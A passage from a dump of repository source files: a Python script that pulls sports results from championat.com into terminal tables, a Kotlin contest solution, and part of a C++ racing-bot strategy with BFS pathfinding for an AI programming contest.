0.5778796076774597, "avg_line_length": 39.1929817199707, "blob_id": "fc8ef39216d313d2132395601e80d8a4a4eb26e7", "content_id": "a360c755533fb1e9aba0fa9365ce14c630b3a86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 250, "num_lines": 114, "path": "/scripts/parseChampionatDotCom", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport json\nimport subprocess\nimport 
requests\nimport math\nimport datetime\nimport time\nimport terminaltables\nimport re\nfrom argparse import ArgumentParser, ArgumentTypeError\n\ndef matcher(s, pat=re.compile(r'^\\d\\d\\d\\d-\\d\\d-\\d\\d$')):\n if not pat.match(s):\n raise ArgumentTypeError('Expected date in format \"yyyy-MM-dd\"')\n return s\n\ndef getArgs():\n parser = ArgumentParser()\n parser.add_argument('-m', '--tomorrow', dest='tomorrow', action='count', help='load results for tomorrow')\n parser.add_argument('-y', '--yesterday', dest='yesterday', action='count', help='load results for yesterday')\n parser.add_argument('-d', '--date', dest='date', type=matcher, help='load results for date=DATE')\n args = parser.parse_args()\n today = datetime.datetime.today() - datetime.timedelta(hours = 3)\n\n if not args.date:\n args.date = today.strftime(\"%Y-%m-%d\")\n if args.tomorrow:\n args.date = (today + datetime.timedelta(days = args.tomorrow)).strftime(\"%Y-%m-%d\")\n if args.yesterday:\n args.date = (today + datetime.timedelta(days = -args.yesterday)).strftime(\"%Y-%m-%d\")\n print(args.date)\n return args.date\n\ncolors = {\n 'GREEN': '\\033[92m',\n 'YELLOW': '\\033[93m',\n 'RED': '\\033[91m',\n 'ENDC': '\\033[0m',\n 'BOLD': '\\033[1m',\n}\n\ndef setColor(color, s):\n return colors[color.upper()] + s + colors['ENDC']\n\nurl = 'https://www.championat.com/stat/{}.json?_={}'.format(getArgs(), str(math.floor(time.time() * 1000)))\ns = subprocess.check_output([\"curl\", url], stderr = open(os.devnull, 'w'))\nactions = json.loads(s)['matches']\n# actions = requests.get(url).json()['matches']\n# actions = requests.get('https://www.championat.com/stat/2018-10-06.json?_=' + str(math.floor(time.time() * 1000))).json()\n# actions = requests.get('https://www.championat.com/live/live/?_=' + str(math.floor(time.time() * 1000))).json()\nnames = ['МИР Российская Премьер-лига', 'Россия - Премьер-Лига', 'Суперкубок России', 'Лига чемпионов', 'Кубок России', 'Товарищеские матчи (сборные)', 'Лига наций УЕФА', 
'Суперкубок УЕФА', 'Лига Европы', 'КХЛ', 'ЧМ', 'ЧЕ', 'Еврохоккейтур', 'Кубок мира', 'Россия - Переходные матчи']\n\ndatas = [ ('Хоккей', 'hockey'), ('Футбол', 'football'), ('Биатлон', 'biathlon') ]\n\ndef boldTeam(team, name):\n if name[:4] == 'Лига':\n return team in ['Зенит', 'Локомотив М', 'Краснодар', 'Ростов', 'ЦСКА', 'Спартак М', 'Оренбург', 'Рубин', 'Урал', 'Ахмат', 'Динамо М', 'СКА', 'Россия']\n return team in ['Зенит', 'СКА', 'Россия']\n\ndef printTour(temp, name):\n table = []\n for match in temp['matches']:\n if 'result' not in match or 'detailed' not in match['result']:\n match['result'] = {'detailed': {'goal1': 0, 'goal2': 0, 'extra': ''}}\n result = match['result']['detailed']\n goals1 = result['goal1']\n goals2 = result['goal2']\n if 'teams' not in match:\n team1 = match['name']\n team2 = ''\n else:\n team1 = match['teams'][0]['name']\n team2 = match['teams'][1]['name']\n time = match['time']\n status = match['status']\n our = boldTeam(team1, name) or boldTeam(team2, name)\n if status == 'окончен':\n if goals1 > goals2:\n team1 = setColor('green', team1)\n team2 = setColor('red', team2)\n elif goals2 > goals1:\n team1 = setColor('red', team1)\n team2 = setColor('green', team2)\n else:\n team1 = setColor('yellow', team1)\n team2 = setColor('yellow', team2)\n\n score = str(goals1) + ':' + str(goals2)\n if result['extra'] != '': score += ' (' + result['extra'].replace(' ', '') + ')'\n arr = [team1, team2, time, score, status['name']]\n if our:\n arr[3] = '> ' + arr[3] + ' <'\n arr = list(map(lambda x: colors['BOLD'] + x, arr))\n arr[4] += colors['ENDC']\n table.append(arr)\n\n table = terminaltables.AsciiTable(table, title=temp['name'])\n # table = terminaltables.SingleTable(table, title=temp['name'])\n table.inner_heading_row_border = False\n for i in range(5):\n table.justify_columns[i] = 'center'\n print(table.table)\n\nfor (name, nameKey) in datas:\n if nameKey not in actions:\n continue\n print('\\n>>>>> ' + name)\n for tour in 
actions[nameKey]['tournaments'].values():\n found = False\n for name in names:\n if tour['name'].find(name) != -1 and tour['name'].find('АФК') == -1 and tour['name'].find('(ж)') == -1:\n printTour(tour, name)\n\n\n" }, { "alpha_fraction": 0.45073968172073364, "alphanum_fraction": 0.4856783151626587, "avg_line_length": 29.548076629638672, "blob_id": "6721bbcb70981e78dd82790c95728b1250af6cdb", "content_id": "1fcf1e1d575d319cd48279a858f7fade576b613e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3177, "license_type": "no_license", "max_line_length": 151, "num_lines": 104, "path": "/CodeForce/1571/E.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nconst val M = 1000000\n\nprivate fun run() {\n val (n) = readln()\n val s = readLine()!!.replace('(', '0').replace(')', '1')\n val a = readLine()!!\n val dp = Array(n) { IntArray(16) { M } }\n val states = listOf(\"0000\", \"0001\", \"0010\", \"0011\", \"0100\", \"0101\", \"0110\", \"0111\", \"1000\", \"1001\", \"1010\", \"1011\", \"1100\", \"1101\", \"1110\", \"1111\")\n val all = states.indices.toList()\n val restricted = listOf(3, 5)\n fun getDiff(s: String, t: String): Int {\n var c = 0\n for (i in s.indices)\n if (s[i] != t[i])\n ++c\n return c\n }\n for (j in states.indices) {\n val state = states[j].substring(1, 4)\n dp[0][j] = getDiff(state, s.substring(0, 3))\n }\n for (i in a.indices) {\n var curStates = all\n if (a[i] == '1')\n curStates = restricted\n for (j in all)\n if (dp[i][j] != M) {\n val prevState = states[j].substring(1, 4)\n for (k in curStates) {\n val curState = states[k]\n if (getDiff(prevState, curState) == 0) {\n dp[i + 1][k] = min(dp[i + 1][k], dp[i][j] + ok(s[i + 3] != curState[3]))\n }\n }\n }\n }\n var ans = M\n for (i in all)\n ans = min(ans, dp[n - 3][i])\n if (ans == M)\n writeln(-1)\n else\n writeln(ans)\n}\n\nprivate fun 
PrintWriter.readSolveWrite() {\n val (t) = readln()\n repeat(t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n @OptIn(kotlin.ExperimentalStdlibApi::class)\n val d = c.code - '0'.code\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.42286843061447144, "alphanum_fraction": 0.44843825697898865, "avg_line_length": 41.62215805053711, "blob_id": "1ffbe8fe3d9335ec46237f0a0a67a7e2a3c6bd82", "content_id": "261d9694ca60a3123255c2ca6bfa76427461391a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 45115, "license_type": "no_license", "max_line_length": 492, "num_lines": 1056, "path": "/trains/ai/cpp-cgdk/MyStrategy.cpp", "repo_name": "Igorjan94/CF", "src_encoding": 
"UTF-8", "text": "\n\n\n\n\n//Не читайте этот код, у Вас вытекут глаза :(\n\n\n\n\n\n//Объезжалочка\n//Я умею говнокодить 2\n//Это гениально и просто..... Зачем я писал столько кода\n#include \"MyStrategy.h\"\n\n#define PI 3.14159265358979323846\n#define _USE_MATH_DEFINES\n#define go(p, a, b) { if (p) goto a; else goto b; }\n\n#include <bits/stdc++.h>\n//#ifdef ONLINE_JUDGE\n//#define debug 1\n//#endif\n#ifdef debug\n//#undef debug\n//#endif\n#include \"library.h\"\n#endif\n\n#ifdef vis\n#include \"Debug.h\"\nDebug visual;\n#endif\nusing namespace model;\nusing namespace std;\n\ndouble DIST_TO_NEXT = 750;\nint COUNT_OF_FAILS = 60;\nint FORCE_BACK = 120;\nint FORCE_RIGHT = 60;\nint FORCE = 100;\nint BREAK = 30;\ndouble MAX_SPEED = 16;\nint FORCE_SLOW_DOWN = 1;\nint GLOBAL_FAIL = 2;\ndouble ANGLE_THROW = PI / 30;\nint PLANB = 123456;\ndouble tileSize = 0.0;\nint dir[15][4];\ndouble eps = 5;\n\nvector<double> power = { 1, 1};\nvector< bool > changed = { false, false};\nvector<double> distToNext = {-10000,-10000};\nvector<double> prevDistance = { 0, 0};\nvector< int > countOfFails = { 0, 0};\nvector< int > forceBack = { 0, 0};\nvector< int > forceRight = { 0, 0};\nvector< int > force = { 0, 0};\nvector< int > prevx = { 0, 0};\nvector< int > currx = {-1234, -1234};\nvector< int > forceSlow = { 0, 0};\nvector< int > globalFail = { 0, 0};\nvector< int > beforeTick = { 555, 190};\nvector<double> turn = { 0.0, 0.0};\nvector< bool > init = { true, true};\nvector< bool > snake = { false, false};\nvector< bool > drift = { false, false};\nvector<double> width = { 0, 0};\nvector<double> height = { 0, 0};\nvector< int > d = { 0, 0};\nvector< int > pd = { 0, 0};\nvector< int > planB = { 0, 0};\nvector<double> tickTargetX = { 0.0, 0.0};\nvector<double> tickTargetY = { 0.0, 0.0};\nvector< int > tickTarget = { 0, 0};\nvector< int > tickTargetI = {-1, -1};\nvector< int > tickTargetJ = {-1, -1};\n\nvector<set<pair<int,int>>> bad;\nvector<vector<pair<int,int>>> 
old;\nvector<vector<vector<bool>>> once;\n\n#define power power[ct]\n#define changed changed[ct]\n#define distToNext distToNext[ct]\n#define prevDistance prevDistance[ct]\n#define countOfFails countOfFails[ct]\n#define forceBack forceBack[ct]\n#define forceRight forceRight[ct]\n#define force force[ct]\n#define prevx prevx[ct]\n#define currx currx[ct]\n#define forceSlow forceSlow[ct]\n#define globalFail globalFail[ct]\n#define beforeTick beforeTick[ct]\n#define turn turn[ct]\n#define init init[ct]\n#define snake snake[ct]\n#define drift drift[ct]\n#define width width[ct]\n#define height height[ct]\n#define d d[ct]\n#define pd pd[ct]\n#define planB planB[ct]\n#define bad bad[ct]\n#define old old[ct]\n#define once once[ct]\n#define tickTarget tickTarget[ct]\n#define tickTargetX tickTargetX[ct]\n#define tickTargetY tickTargetY[ct]\n#define tickTargetI tickTargetI[ct]\n#define tickTargetJ tickTargetJ[ct]\n\n#define RIGHT 0\n#define UP 1\n#define LEFT 2\n#define DOWN 3\n\nvector<int> ddx = {1, 0, -1, 0};\nvector<int> ddy = {0, -1, 0, 1};\nmap<pair<int, int>, int> directions;\n\nvector<vector<vector<int>>> goforward = { { { RIGHT, UP, DOWN, LEFT }, { RIGHT, UP, LEFT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, { { UP, RIGHT, DOWN, LEFT }, { UP, LEFT, RIGHT, DOWN }, { UP, LEFT, DOWN, RIGHT }, { DOWN, LEFT, RIGHT, UP } }, { { RIGHT, UP, DOWN, LEFT }, { LEFT, UP, RIGHT, DOWN }, { LEFT, UP, DOWN, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, { { DOWN, RIGHT, UP, LEFT }, { UP, RIGHT, LEFT, DOWN }, { DOWN, LEFT, UP, RIGHT }, { DOWN, RIGHT, LEFT, UP } } };\n\nvector<vector<vector<int>>> FUUUUU = { { { UP, DOWN, RIGHT, LEFT }, { RIGHT, UP, LEFT, DOWN }, { UP, DOWN, LEFT, RIGHT }, { RIGHT, DOWN, LEFT, UP } }, { { UP, RIGHT, DOWN, LEFT }, { LEFT, RIGHT, UP, DOWN }, { UP, LEFT, DOWN, RIGHT }, { LEFT, RIGHT, DOWN, UP } }, { { UP, DOWN, RIGHT, LEFT }, { LEFT, UP, RIGHT, DOWN }, { UP, DOWN, LEFT, RIGHT }, { LEFT, DOWN, RIGHT, UP } }, { { DOWN, RIGHT, UP, LEFT }, { RIGHT, 
LEFT, UP, DOWN }, { DOWN, LEFT, UP, RIGHT }, { RIGHT, LEFT, DOWN, UP } } }, FU;\n\nint opposite(int x, int y) { return abs(x - y) == 2; }\n\nstruct vertex\n{\n int x, y, qd, qpd, hasBonus;\n vertex(){}\n vertex(int x, int y, int pdd, int ddd, int hb) : x(x), y(y), qd(ddd), qpd(pdd), hasBonus(hb) {}\n};\n\ntemplate <typename T>\nvoid ppp(vector<vector<T>> a)\n{\n int n = a.size();\n int m = a[0].size();\n for (int j = 0; j < m; ++j)\n for (int i = 0; i < n; ++i)\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\n printf(\"\\n\");\n}\n\nbool isCorner(TileType a) { return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS); }\n\ndouble getCenter(double xxx) { return (xxx + 0.5) * tileSize; }\n\ndouble get(double xxx) { return xxx * tileSize; }\n\ndouble get34(double xxx) { return (xxx + 0.9) * tileSize; }\n\ndouble get14(double xxx) { return (xxx + 0.1) * tileSize; }\n\nbool isVertical(pair<int, int> a, pair<int, int> b) { return a.first == b.first; }\n\nbool isHorizontal(pair<int, int> a, pair<int, int> b) { return a.second == b.second; }\n\nbool is32(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4]) &&\n !isVertical(a[1], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]) &&\n !isHorizontal(a[1], a[4])); else\n return false;\n}\n\nbool is3_2(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isVertical(a[1], a[4]) &&\n isHorizontal(a[3], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isHorizontal(a[1], a[4]) &&\n isVertical(a[3], a[4])); else\n return false;\n}\n\nbool is212(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) 
&&\n isVertical(a[3], a[4]) &&\n isHorizontal(a[1], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4]) &&\n isVertical(a[1], a[4])); else\n return false;\n}\n\nbool is41(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4])); else\n return false;\n}\n\nbool is4(vector<pair<int, int>>& a)\n{\n if (a.size() >= 4)\n return ( isHorizontal(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]))\n || ( isVertical(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3])); else\n return false;\n}\n\nbool is131(vector<pair<int, int>>& a)\n{\n if (a.size() >= 5)\n return ( isVertical(a[0], a[1]) &&\n isHorizontal(a[1], a[2]) &&\n isHorizontal(a[2], a[3]) &&\n isVertical(a[3], a[4]))\n || ( isHorizontal(a[0], a[1]) &&\n isVertical(a[1], a[2]) &&\n isVertical(a[2], a[3]) &&\n isHorizontal(a[3], a[4])); else\n return false;\n}\n\npair<int, int> getXX(pair<int, int>& a, pair<int, int>& b) {\n if (isVertical(a, b))\n return make_pair(getCenter(a.first), get(max(a.second, b.second)));\n else\n return make_pair(get(max(a.first, b.first)), getCenter(a.second)); }\n\ndouble get(double x, double v) { return (x + v) * tileSize; }\n\npair<int, int> getCorner(pair<int, int>& a, pair<int, int>& b, pair<int, int>& c)\n{\n double xxx = 0.35;\n if (isVertical(a, b))\n return make_pair(get(max(b.first, c.first)), get(b.second, a.second < b.second ? xxx : 1 - xxx));\n else\n return make_pair(get(b.first, a.first < b.first ? 
xxx : 1 - xxx), get(max(b.second, c.second)));\n}\n\nint opposite(int x) { switch (x) { case LEFT: case RIGHT: return 2 - x; default: return 4 - x; } }\n\nbool isRightTo(pair<int, int> a, pair<int, int> b) { return a.first - 1 == b.first && a.second == b.second; }\n\nbool isLeftTo(pair<int, int> a, pair<int, int> b) { return a.first + 1 == b.first && a.second == b.second; }\n\nbool isUpTo(pair<int, int> a, pair<int, int> b) { return a.first == b.first && a.second + 1 == b.second; }\n\nbool isDownTo(pair<int, int> a, pair<int, int> b) { return a.first == b.first && a.second - 1 == b.second; }\n\nint getDirectionByAngle(double angle)\n{\n double sasdfasdf = PI / 9;\n if (fabs(angle) < sasdfasdf)\n return RIGHT;\n if (fabs(angle - PI / 2) < sasdfasdf)\n return DOWN;\n if (fabs(angle + PI / 2) < sasdfasdf)\n return UP;\n if (fabs(angle - PI) < sasdfasdf)\n return LEFT;\n if (fabs(angle + PI) < sasdfasdf)\n return LEFT;\n return -1;\n}\n\npair<int, int> getNextTurn(vector<pair<int, int>> path, int index = 0)\n{\n for (int i = index + 1; i < int(path.size()) - 1; ++i)\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == path[i + 1])\n return path[i];\n return path.back();\n}\n\npair<int, int> reflect(pair<int, int> a, pair<int, int> b)\n{\n return isHorizontal(a, b) ? make_pair(a.first < b.first ? b.first + 1 : b.first - 1, b.second) : make_pair(b.first, a.second < b.second ? b.second + 1 : b.second - 1);\n}\n\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\n CarType ct = self.getType();\n bool badMap = true;//world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\";\n cout << (self.getType() == BUGGY ? 
\"BUGGY\\n\" : \"JEEP\\n\");\n cout.flush();\n {\n tileSize = game.getTrackTileSize();\n auto a = world.getTilesXY();\n for (int i = 0; i < a.size(); ++i)\n for (int j = 0; j < a[0].size(); ++j)\n if (a[i][j] == UNKNOWN)\n a[i][j] = CROSSROADS;\n if (init)\n {\n FU = goforward;\n\n if (world.getMapName() == \"map07\")// || world.getMapName() == \"map08\")// || world.getMapName() == \"map14\")\n FUUUUU = goforward;\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\n\n init = false;\n width = self.getWidth() / 2;\n height = self.getHeight() / 2;\n once.resize(a.size());\n for (int i = 0; i < once.size(); ++i)\n once[i].resize(a[0].size(), false);\n d = getDirectionByAngle(self.getAngle());\n pd = d;\n srand(game.getRandomSeed());\n }\n int waypointIndex = self.getNextWaypointIndex();\n int qx = self.getX() / tileSize;\n int qy = self.getY() / tileSize;\n int wx, wy;\n tie(wx, wy) = old.back();\n if ((wx != qx || wy != qy) && forceBack == 0)\n {\n old[0] = {qx, qy};\n pd = d;\n d = directions[make_pair(qx - wx, qy - wy)];\n //if (forceBack)\n //d = opposite(d);\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\n FU = FUUUUU;\n }\n prevx = currx;\n if (prevx == -1234)\n prevx = self.getX();\n currx = self.getX();\n if (currx - prevx != 0)\n changed = true;\n int ti = self.getNextWaypointX();\n int tj = self.getNextWaypointY();\n auto wp = world.getWaypoints();\n for (int i = 0; i < min(3, int(wp.size())); ++i)\n wp.push_back(wp[i]);\n int fi, fj, pi, pj;\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\n double targetX = getCenter(ti);\n double targetY = getCenter(tj);\n int si = self.getX() / tileSize;\n int sj = self.getY() / tileSize;\n pair<int, int> S = make_pair(si, sj);\n vector<int> qwerqsdfgsdf = {si, sj};\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\n once[si][sj] = true;\n if (bad.find(S) == bad.end())\n bad.clear();\n int n = 
a.size();\n int m = a[0].size();\n auto ok = [&](int x, int N)\n {\n return x >= 0 && x < N;\n };\n\n auto getPath = [&](int si, int sj, int tti, int ttj, int pdd, int dd, vector<vector<vector<int>>> FUUUUU, int countBonuses = 1)\n {\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\n {\n vector<pair<int, int>> path;\n while (u != si || v != sj)\n path.push_back({u, v}),\n tie(u, v) = prev[u][v];\n path.push_back({si, sj});\n reverse(path.begin(), path.end());\n return path;\n };\n auto bfs = [&](int si, int sj, int tti, int ttj, int pdd, int dd, vector<vector<vector<int>>> FUUUUUF)\n {\n queue<vertex> q;\n q.push(vertex(si, sj, pdd, dd, 0));\n vector<vector<int>> dist(n, vector<int>(m, 10000));\n vector<vector<vector<int>>> FUUUUU;\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\n dist[si][sj] = 0;\n int u, v, prevD, prevprevD;\n while (q.size())\n {\n u = q.front().x;\n v = q.front().y;\n prevD = q.front().qd;\n prevprevD = q.front().qpd;\n int hasBonus = 0;\n for (Bonus bonus : world.getBonuses())\n if ((bonus.getType() == PURE_SCORE || (bonus.getType() == REPAIR_KIT && self.getDurability() < 20)) && int(bonus.getX() / tileSize) == u && int(bonus.getY() / tileSize) == v\n && fabs(bonus.getX() - getCenter(bonus.getX() / tileSize) < 0.3 * tileSize)\n && fabs(bonus.getY() - getCenter(bonus.getY() / tileSize) < 0.3 * tileSize))\n hasBonus++;\n if (countBonuses == 0)\n hasBonus = 0;\n FUUUUU = hasBonus ? 
goforward : FUUUUUF;\n q.pop();\n if (a[u][v] == UNKNOWN)\n continue;\n vector<int> dx;\n vector<int> dy;\n for (int i = 0; i < 4; ++i)\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\n for (int i = 0; i < 4; ++i)\n {\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\n {\n int isReverse = opposite(prevD, iAmIdiot);\n int isShpilka = opposite(prevprevD, iAmIdiot);\n int temp = dist[u][v] + 1 + isShpilka * 3 + isReverse * 12 - hasBonus;\n if (dist[u + dx[i]][v + dy[i]] > temp)\n {\n dist[u + dx[i]][v + dy[i]] = temp;\n prev[u + dx[i]][v + dy[i]] = {u, v};\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot, hasBonus));\n }\n }\n }\n }\n return make_pair(d, prev);\n };\n auto qqwerwer = bfs(si, sj, tti, ttj, pdd, dd, FUUUUU);\n int u, v;\n u = tti;\n v = ttj;\n auto prev = qqwerwer.second;\n auto path = fffpath(si, sj, u, v, prev);\n return path;\n };\n vector<pair<int, int>> path;\n int qqq = ti;\n int www = tj;\n path = getPath(si, sj, ti, tj, pd, d, FU);\n tie(ti, tj) = getNextTurn(path);\n targetX = getCenter(ti);\n targetY = getCenter(tj);\n if (fabs(self.getAngleTo(targetX, targetY)) > PI / 3 && forceBack == 0 && forceRight == 0 && planB == 0)\n path = getPath(si, sj, qqq, www, pd, d, goforward, 0);\n\n for (int i = 0; i + 4 < min(8, int(path.size())); ++i)\n if (\n (\n isVertical(path[i + 0], path[i + 1]) &&\n isVertical(path[i + 2], path[i + 3]) &&\n isHorizontal(path[i + 0], path[i + 3]) &&\n isHorizontal(path[i + 1], path[i + 2])\n )\n ||\n (\n isHorizontal(path[i + 0], path[i + 1]) &&\n isHorizontal(path[i + 2], path[i + 3]) &&\n isVertical(path[i + 0], path[i + 3]) &&\n isVertical(path[i + 1], path[i + 2])\n )\n )\n {\n path = getPath(si, sj, qqq, www, pd, d, goforward);\n break;\n }\n int ai, aj, bi, bj, ci, cj, di, dj;\n while (waypointIndex + 1 < int(wp.size()))\n {\n int t = 
0;\n int y = 0;\n auto zxcv = path.back();\n auto asdf = path.back();\n auto qwer = path.back();\n if (path.size() >= 2)\n asdf = path[path.size() - 2];\n if (path.size() >= 3)\n zxcv = path[path.size() - 3];\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\n if (path.size() < 3)\n t = d;\n int q = wp[waypointIndex][0];\n int w = wp[waypointIndex][1];\n int e = wp[waypointIndex + 1][0];\n int r = wp[waypointIndex + 1][1];\n auto temp = getPath(q, w, e, r, t, y, FU);\n if (temp.size() <= 1)\n break;\n for (auto x : temp)\n path.push_back(x);\n waypointIndex++;\n }\n for (int i = 1; i < int(path.size()); ++i)\n if (path[i] == path[i - 1])\n path.erase(path.begin() + --i);\n tie(ti, tj) = getNextTurn(path);\n targetX = getCenter(ti);\n targetY = getCenter(tj);\n for (int i = 0; i < int(path.size()); ++i)\n if (path[i].first == ti && path[i].second == tj)\n {\n pi = path[max(0, i - 1)].first;\n pj = path[max(0, i - 1)].second;\n fi = path[min(int(path.size()) - 1, i + 1)].first;\n fj = path[min(int(path.size()) - 1, i + 1)].second;\n break;\n }\n double randomName = 1;\n if (path.size() >= 3)\n {\n tie(ai, aj) = path[0];\n tie(bi, bj) = path[1];\n tie(ci, cj) = path[2];\n }\n if (path.size() >= 4)\n {\n tie(di, dj) = path[3];\n snake = true;\n if (path[0] == path[2]);\n else\n if (bad.find(S) == bad.end() && (\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\n ))\n {\n tie(targetX, targetY) = getXX(path[1], path[2]);\n int ri, rj;\n tie(ri, rj) = getNextTurn(path, 2); \n if (abs(ci - ri) + abs(cj - rj) >= 2)\n {\n ////tie(targetX, targetY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\n tie(tickTargetX, tickTargetY) = 
getXX(path[2], path[3]);\n tickTargetI = bi;\n tickTargetJ = bj;\n ////tie(pi, pj) = path[1];\n ////tie(ti, tj) = path[2];\n ////tie(fi, fj) = path[3];\n ////targetX = getCenter(ti);\n ////targetY = getCenter(tj);\n ////randomName = 1;\n ////snake = false;\n }\n }\n else\n {\n drift = true;\n snake = false;\n if (\n (\n isVertical(path[0], path[1]) &&\n isVertical(path[2], path[3]) &&\n isHorizontal(path[0], path[3]) &&\n isHorizontal(path[1], path[2])\n )\n ||\n (\n isHorizontal(path[0], path[1]) &&\n isHorizontal(path[2], path[3]) &&\n isVertical(path[0], path[3]) &&\n isVertical(path[1], path[2])\n )\n )\n {\n bool is33 = d == directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)];\n bad.insert(path[1]);\n\n if (!is33)\n bad.insert(path[0]),\n bad.insert(path[2]),\n tie(targetX, targetY) = getCorner(path[0], path[1], path[2]);\n else\n //tie(pi, pj) = reflect(path[0], path[1]),\n //tie(fi, fj) = path[2],\n //a[ti][tj] = CROSSROADS,\n drift = false;\n }\n else\n drift = false;\n }\n } else\n drift = false,\n snake = false;\n if (si == tickTargetI && sj == tickTargetJ)\n {\n if (tickTarget == -1)\n tickTarget = world.getTick() + 25 - speedModule + badMap * 20;\n }\n else\n tickTarget = -1,\n tickTargetI = -1,\n tickTargetJ = -1,\n tickTargetX = -1,\n tickTargetY = -1;\n if (world.getTick() < tickTarget)\n targetX = tickTargetX,\n targetY = tickTargetY,\n snake = true;\n double temp = self.getDistanceTo(targetX, targetY);\n double temp2 = temp / tileSize / randomName;\n prevDistance = distToNext;\n distToNext = temp;\n auto interpolation = [&](double x)\n {\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2;\n 
